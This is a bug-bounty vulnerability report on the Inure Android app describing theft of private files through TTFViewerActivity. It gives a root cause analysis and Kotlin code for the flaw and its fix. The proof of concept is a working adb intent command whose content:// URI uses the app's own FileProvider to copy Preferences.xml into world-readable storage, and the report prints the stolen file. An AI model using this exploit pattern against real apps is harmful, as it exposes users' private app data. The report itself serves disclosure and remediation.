huntr | blackbeard666 | F729D2C8-A62E-4F30-AC24-E187B0A7892A
Aug 24, 2023 - 11:27 p.m.

Theft of Arbitrary Files due to lack of intent validation and insecure usage of provider paths in TTFViewerActivity.kt

www.huntr.dev
Tags: ttfvieweractivity, theft of arbitrary files, intent validation, insecure provider paths, android, ios, oversecured, vulnerability scanner, external files directory, proof of concept, bug bounty

EPSS: 0.001 (Low), percentile 37.2%

Description

Through the use of Oversecured, a vulnerability scanner for Android and iOS applications, we were able to detect a Theft of Arbitrary Files vulnerability within TTFViewerActivity.kt. Check the full issue definition in the image below:

Root Cause Analysis

The TTFViewerActivity failed to validate the incoming intent.data before forwarding it to the openInputStream function, so any URI supplied by the calling app is opened with Inure's own identity and permissions. For instance, a content:// URI using the Inure application's own file provider authority can be supplied, which lets an attacker read files from the app's internal data directory through the app itself.

Extraction of the opened files was facilitated by their storage in a directory accessible to other processes. The activity used context.getExternalFilesDir to save the copies, so they landed under /storage/emulated/0/Android/data/app.simple.inure/files, where they can be read over adb and by other apps that hold storage access.

This attack was chained with an insecure provider path configuration, which further contributed to the exploit: the root path alias seen in the content:// URI of the proof of concept below resolves against the device filesystem, so the app's own FileProvider will serve any file the app can read, including its private shared_prefs directory.
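To make the two defects concrete, the following is an added illustration written for this report, not code from the Inure project. It sketches an activity that copies the font referenced by intent.data: vulnerableCopy reproduces the pattern described above (any URI opened, copy written under getExternalFilesDir with an attacker-chosen file name), and hardenedCopy shows a corrected version. Assumed for the example: the activity is launched with ACTION_VIEW and the font URI in intent.data, and the app's FileProvider authority is app.simple.inure.provider, as used in the PoC URI. The class and method names are hypothetical.

```kotlin
// Added illustration for this report, not code from the Inure project.
// Assumed: the activity receives ACTION_VIEW with the font URI in intent.data,
// and the app's FileProvider authority is "app.simple.inure.provider" (the
// authority used in the PoC URI). Class and method names are hypothetical.
package app.simple.inure.example

import android.app.Activity
import android.net.Uri
import android.os.Bundle
import java.io.File
import java.io.FileOutputStream

class TtfViewerExample : Activity() {

    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        val uri = intent.data
        if (uri == null) { finish(); return }
        // vulnerableCopy(uri) reproduces the behaviour described in the report.
        val cached = hardenedCopy(uri)
        if (cached == null) { finish(); return }
        // ... parse and render the font from `cached`
    }

    // Pattern the report describes: every URI is opened with this app's own
    // identity, so a content:// URI served by the app's own FileProvider hands
    // the caller a copy of any file the app can read. The copy is written below
    // getExternalFilesDir(), where adb and other apps can fetch it, and the file
    // name is taken straight from the attacker-controlled URI (which is why
    // "Preferences.xml" shows up in font_cache in the PoC).
    private fun vulnerableCopy(uri: Uri): File {
        val dir = File(getExternalFilesDir(null), "font_cache").apply { mkdirs() }
        val out = File(dir, uri.lastPathSegment ?: "font.ttf")
        contentResolver.openInputStream(uri)!!.use { input ->
            FileOutputStream(out).use { output -> input.copyTo(output) }
        }
        return out
    }

    // Hardened: refuse any source that would read our own private files through
    // us, and keep the working copy in internal cache under a name we choose.
    private fun hardenedCopy(uri: Uri): File? {
        if (!isAcceptableSource(uri)) return null
        val dir = File(cacheDir, "font_cache").apply { mkdirs() }
        val out = File.createTempFile("font_", ".ttf", dir)
        val input = contentResolver.openInputStream(uri) ?: return null
        input.use { i -> FileOutputStream(out).use { o -> i.copyTo(o) } }
        return out
    }

    // Accept only content:// URIs served by a provider that belongs to another
    // package. file:// is rejected because file:///data/data/<pkg>/... would be
    // opened with our own permissions just like the provider route; a content://
    // authority that resolves to our own package is the exact vector in this
    // report.
    private fun isAcceptableSource(uri: Uri): Boolean {
        if (uri.scheme != "content") return false
        val authority = uri.authority ?: return false
        val info = packageManager.resolveContentProvider(authority, 0) ?: return false
        return info.packageName != packageName
    }
}
```

The ownership check via resolveContentProvider is what closes the intent-validation hole; it rejects the PoC URI regardless of which path alias the provider exposes. Independently of that check, the provider's own path configuration should not contain a root-path entry (which is what the root alias in the PoC URI suggests), since that maps the whole filesystem; restrict it to the one subdirectory that actually needs to be shared.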

Proof of Concept

Access your device shell using adb shell, then navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache to examine the contents of the directory. For now it is empty:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 6  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..

Send the following intent:

adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"

Review the font_cache directory again and notice that Preferences.xml has been saved there:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 10  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..  
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml 
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<map>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<boolean name="dont_show_again" value="true" />  
<int name="main_app_launch_count" value="13" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<int name="notes_list_type" value="0" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<long name="crash_timestamp" value="-1" />  
<boolean name="deep_search_keyword_mode" value="false" />  
</map>  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $
